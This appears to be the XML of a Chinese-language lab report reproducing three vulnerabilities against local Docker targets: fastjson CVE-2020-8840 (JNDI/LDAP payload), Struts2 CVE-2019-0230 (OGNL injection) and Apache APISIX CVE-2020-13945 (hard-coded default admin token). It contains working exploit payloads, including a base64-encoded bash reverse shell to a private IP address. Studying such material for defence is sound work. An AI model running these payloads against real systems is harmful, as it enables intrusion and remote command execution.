    <w:p w14:paraId="3863CF53" w14:textId="111A8EA5" w:rsidR="00CB41B8" w:rsidRDefault="00CB41B8" w:rsidP="00CB41B8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中创建</w:t>
      </w:r>
      <w:r w:rsidR="0069604C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SpringBoot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目，引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fastjson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依赖如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219199D8" w14:textId="61AD61C0" w:rsidR="00CB41B8" w:rsidRDefault="00CB41B8" w:rsidP="00CB41B8">
      <w:r w:rsidRPr="00CB41B8">
        <w:t>&lt;dependency&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB41B8">
        <w:br/>
        <w:t xml:space="preserve">    &lt;groupId&gt;com.alibaba&lt;/groupId&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB41B8">
        <w:br/>
        <w:t xml:space="preserve">    &lt;artifactId&gt;fastjson&lt;/artifactId&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB41B8">
        <w:br/>
        <w:t xml:space="preserve">    &lt;version&gt;1.2.62&lt;/version&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB41B8">
        <w:br/>
        <w:t>&lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2F250E" w14:textId="79CF4D18" w:rsidR="00CB41B8" w:rsidRPr="00CB41B8" w:rsidRDefault="00CB41B8" w:rsidP="00CB41B8">
      <w:r w:rsidRPr="00CB41B8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20CD790C" wp14:editId="05A9876C">
            <wp:extent cx="3549832" cy="1270065"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2056996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96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CE32" w14:textId="0D126B1C" w:rsidR="00CB41B8" w:rsidRDefault="00CB41B8" w:rsidP="00CB41B8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接着添加一个</w:t>
      </w:r>
      <w:r w:rsidR="00934008" w:rsidRPr="00934008">
        <w:t>RestController</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，包含接口调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fastjson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>parseObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E724AF0" w14:textId="77777777" w:rsidR="00934008" w:rsidRPr="00934008" w:rsidRDefault="00934008" w:rsidP="00934008">
      <w:r w:rsidRPr="00934008">
        <w:t>package com.example.cve20208840.demos.web;</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:br/>
        <w:t>import com.alibaba.fastjson.JSON;</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:br/>
        <w:t>import com.alibaba.fastjson.parser.ParserConfig;</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:br/>
        <w:t>import org.springframework.web.bind.annotation.GetMapping;</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:br/>
        <w:t>import org.springframework.web.bind.annotation.RequestParam;</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:br/>
        <w:t>import org.springframework.web.bind.annotation.RestController;</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:br/>
        <w:t>@RestController</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:br/>
        <w:t>public class pocController {</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:br/>
        <w:t xml:space="preserve">    @GetMapping("/json")</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:br/>
        <w:t xml:space="preserve">    public String parseJson(@RequestParam String poc) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:br/>
        <w:t xml:space="preserve">        ParserConfig.</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>getGlobalInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:t>().setAutoTypeSupport(true);</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//        String payload = "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"AsText\":\"ldap://127.0.0.1:8085/iosmYQbv\"}";</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:t>Object jsonObject = JSON.</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>parseObject</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:t>(poc);</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:br/>
        <w:t xml:space="preserve">        return jsonObject.toString();</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r w:rsidRPr="00934008">
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056F551E" w14:textId="03D2C3E7" w:rsidR="00E979AF" w:rsidRDefault="00CB41B8" w:rsidP="00CB41B8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDEF998" w14:textId="3209B370" w:rsidR="00E979AF" w:rsidRDefault="00E979AF" w:rsidP="00E979AF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB41B8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D11C3AD" w14:textId="53511AEA" w:rsidR="00E979AF" w:rsidRDefault="00E979AF" w:rsidP="00E979AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Yakit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搭建恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ldap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0330C657" w14:textId="0547B5FB" w:rsidR="00E979AF" w:rsidRDefault="00E979AF" w:rsidP="00E979AF">
      <w:r w:rsidRPr="00E979AF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="253AC22B" wp14:editId="088AD15C">
            <wp:extent cx="5274310" cy="1134110"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="26298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8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1978" w14:textId="31FDB3D9" w:rsidR="00E979AF" w:rsidRDefault="00E979AF" w:rsidP="00E979AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidR="0069604C" w:rsidRPr="0069604C">
        <w:t>http://127.0.0.1:8080/json?poc={"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://127.0.0.1:8085/iosmYQbv"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CE1A18" w14:textId="1C84D810" w:rsidR="00E979AF" w:rsidRDefault="00E979AF" w:rsidP="00E979AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功弹出计算器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3B48EA" w14:textId="34908ACC" w:rsidR="00DE2C39" w:rsidRDefault="00E979AF" w:rsidP="00DE2C39">
      <w:r w:rsidRPr="00E979AF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5283F670" wp14:editId="4620F989">
            <wp:extent cx="5274310" cy="3569970"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="412835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35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91B4" w14:textId="55E116BC" w:rsidR="00DE2C39" w:rsidRPr="006B763B" w:rsidRDefault="00DE2C39" w:rsidP="00DE2C39">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B763B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2019-0230</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002B6E07" w14:textId="2C3280E4" w:rsidR="00DE2C39" w:rsidRDefault="00DE2C39" w:rsidP="00DE2C39">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090DA588" w14:textId="6EAA97EA" w:rsidR="004D02C4" w:rsidRDefault="004D02C4" w:rsidP="004D02C4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vulhub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶场的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E38528" w14:textId="77777777" w:rsidR="004D02C4" w:rsidRDefault="004D02C4" w:rsidP="004D02C4">
      <w:r w:rsidRPr="004D02C4">
        <w:t>docker pull vulhub/struts2:2.5.16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2621AB58" w14:textId="77777777" w:rsidR="004D02C4" w:rsidRPr="004D02C4" w:rsidRDefault="004D02C4" w:rsidP="004D02C4"/>
    <w:p w14:paraId="5279CFB1" w14:textId="181FBEFF" w:rsidR="004D02C4" w:rsidRPr="004D02C4" w:rsidRDefault="004D02C4" w:rsidP="004D02C4">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682B70B0" w14:textId="2BE9E714" w:rsidR="004D02C4" w:rsidRPr="004D02C4" w:rsidRDefault="004D02C4" w:rsidP="004D02C4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搭建好</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后访问，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="004D02C4">
        <w:t>%{2*2}</w:t>
      </w:r>
      <w:r w:rsidRPr="004D02C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到成功解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7FA41C" w14:textId="69E34CA2" w:rsidR="004D02C4" w:rsidRDefault="004D02C4" w:rsidP="004D02C4">
      <w:r w:rsidRPr="004D02C4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A39DE02" wp14:editId="7906E4EA">
            <wp:extent cx="3645087" cy="1727289"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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2951C9DE-7382-7E53-DFBF-5876221F68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2951C9DE-7382-7E53-DFBF-5876221F68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61AD" w14:textId="73D39B0C" w:rsidR="004D02C4" w:rsidRDefault="004D02C4" w:rsidP="004D02C4">
      <w:r w:rsidRPr="004D02C4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72C51EEE" wp14:editId="0F407FCF">
            <wp:extent cx="3645087" cy="2109830"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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81855349-E17F-9106-0A45-329E4D64FC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81855349-E17F-9106-0A45-329E4D64FC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10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3E5E" w14:textId="3FEDFC33" w:rsidR="004D02C4" w:rsidRDefault="004D02C4" w:rsidP="004D02C4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ONGL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表达式注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AA46C1" w14:textId="11996F9D" w:rsidR="004D02C4" w:rsidRDefault="004D02C4" w:rsidP="004D02C4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来进行漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389B1186" w14:textId="77777777" w:rsidR="004D02C4" w:rsidRPr="004D02C4" w:rsidRDefault="004D02C4" w:rsidP="004D02C4">
      <w:r w:rsidRPr="004D02C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一个</w:t>
      </w:r>
      <w:r w:rsidRPr="004D02C4">
        <w:t>post</w:t>
      </w:r>
      <w:r w:rsidRPr="004D02C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C2B468" w14:textId="77777777" w:rsidR="004D02C4" w:rsidRPr="004D02C4" w:rsidRDefault="004D02C4" w:rsidP="004D02C4">
      <w:r w:rsidRPr="004D02C4">
        <w:t>"id":"%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F5D79C" w14:textId="17367AF6" w:rsidR="004D02C4" w:rsidRPr="004D02C4" w:rsidRDefault="004D02C4" w:rsidP="004D02C4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二个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618121C8" w14:textId="433B1CA3" w:rsidR="004D02C4" w:rsidRPr="004D02C4" w:rsidRDefault="004D02C4" w:rsidP="004D02C4">
      <w:r w:rsidRPr="004D02C4">
        <w:t>"id":"%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjIuMzIuMS85MDE1IDA+JjE=}|{base64,-d}|{bash,-i}'))}</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7066EC8B" w14:textId="30CAC54E" w:rsidR="004D02C4" w:rsidRPr="004D02C4" w:rsidRDefault="004D02C4" w:rsidP="004D02C4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将弹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编码到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面，即可进行命令执行，最终成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0071EEC2" w14:textId="7DD908F4" w:rsidR="00DE2C39" w:rsidRPr="006B763B" w:rsidRDefault="00DE2C39" w:rsidP="00DE2C39">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B763B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2020-13945</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36835D45" w14:textId="251EDDDF" w:rsidR="00DE2C39" w:rsidRPr="00DE2C39" w:rsidRDefault="00DE2C39" w:rsidP="00DE2C39">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544740F3" w14:textId="77777777" w:rsidR="006B763B" w:rsidRPr="006B763B" w:rsidRDefault="006B763B" w:rsidP="006B763B">
      <w:r w:rsidRPr="006B763B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:t>vulhub</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:t>docker-compose</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境搭建靶机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DC0B0A" w14:textId="1FFC11D6" w:rsidR="006B763B" w:rsidRPr="006B763B" w:rsidRDefault="006B763B" w:rsidP="006B763B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:t>ocker-compose up</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功搭建复现环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B77A3FF" w14:textId="77777777" w:rsidR="006B763B" w:rsidRPr="006B763B" w:rsidRDefault="006B763B" w:rsidP="006B763B">
      <w:r w:rsidRPr="006B763B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:t>APISIX</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的默认</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被硬编码到代码中：</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:t>edd1c9f034335f136f87ad84b625c8f1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7A12D7" w14:textId="77777777" w:rsidR="00DE2C39" w:rsidRDefault="00DE2C39" w:rsidP="00DE2C39"/>
    <w:p w14:paraId="43C569C2" w14:textId="07771C43" w:rsidR="00DE2C39" w:rsidRDefault="00DE2C39" w:rsidP="00DE2C39">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461068AF" w14:textId="77777777" w:rsidR="006B763B" w:rsidRPr="006B763B" w:rsidRDefault="006B763B" w:rsidP="006B763B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:t>/apisix/admin/routes</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:t>post</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码即可获取命令执行权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443E7914" w14:textId="5CF8678D" w:rsidR="006B763B" w:rsidRDefault="006B763B" w:rsidP="006B763B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>接下来进行漏洞脚本的编写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59997792" w14:textId="77777777" w:rsidR="006B763B" w:rsidRPr="006B763B" w:rsidRDefault="006B763B" w:rsidP="006B763B">
      <w:r w:rsidRPr="006B763B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数来执行命令，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:t>lscpu</w:t>
      </w:r>
      <w:r w:rsidRPr="006B763B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试命令执行是否成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C25ACF4" w14:textId="7B074DC3" w:rsidR="006B763B" w:rsidRDefault="006B763B" w:rsidP="006B763B">
      <w:r w:rsidRPr="006B763B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11D74053" wp14:editId="72D64279">
            <wp:extent cx="5274310" cy="2197100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0F14ED8-F185-3058-D6DD-F3B58F775B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0F14ED8-F185-3058-D6DD-F3B58F775B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C8D" w14:textId="0709A68E" w:rsidR="006B763B" w:rsidRDefault="006B763B" w:rsidP="006B763B">
      <w:r w:rsidRPr="006B763B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FBCE926" wp14:editId="7D492CAB">
            <wp:extent cx="4937399" cy="2111832"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1396213380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EB74741-A376-8355-7D89-9556DB92C1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EB74741-A376-8355-7D89-9556DB92C1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399" cy="21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699" w14:textId="24A5D33E" w:rsidR="006B763B" w:rsidRPr="006B763B" w:rsidRDefault="006B763B" w:rsidP="006B763B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lscpu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令成功被执行，返回了最终结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4350F8" w14:textId="75D9CAD7" w:rsidR="00B641D2" w:rsidRDefault="00000000" w:rsidP="00B641D2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="15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25D95367" w14:textId="0E9F14E8" w:rsidR="00B641D2" w:rsidRDefault="00B641D2" w:rsidP="00B641D2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r w:rsidRPr="00B641D2">
        <w:t>CVE-2020-8840</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777799CE" w14:textId="4C042010" w:rsidR="00B641D2" w:rsidRPr="00B641D2" w:rsidRDefault="00B641D2" w:rsidP="00B641D2">
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ocker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yakit</w:t>
      </w:r>
      <w:r w:rsidR="00550A89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00550A89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jdk8u65</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A29B829" w14:textId="04AF2C0F" w:rsidR="00B641D2" w:rsidRDefault="00B641D2" w:rsidP="00B641D2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r w:rsidRPr="00B641D2">
        <w:t>CVE-2019-0230</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7FA31E" w14:textId="2B4C0E73" w:rsidR="00B641D2" w:rsidRDefault="00B641D2" w:rsidP="00B641D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Docker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netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6635CE" w14:textId="698C1E6F" w:rsidR="00B641D2" w:rsidRDefault="00B641D2" w:rsidP="00B641D2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="00B641D2">
        <w:t>-2020-13945</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD2D361" w14:textId="2EF013BF" w:rsidR="00B641D2" w:rsidRPr="00B641D2" w:rsidRDefault="00B641D2" w:rsidP="00B641D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker-compose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0068A67D" w14:textId="77777777" w:rsidR="00FE1C0F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
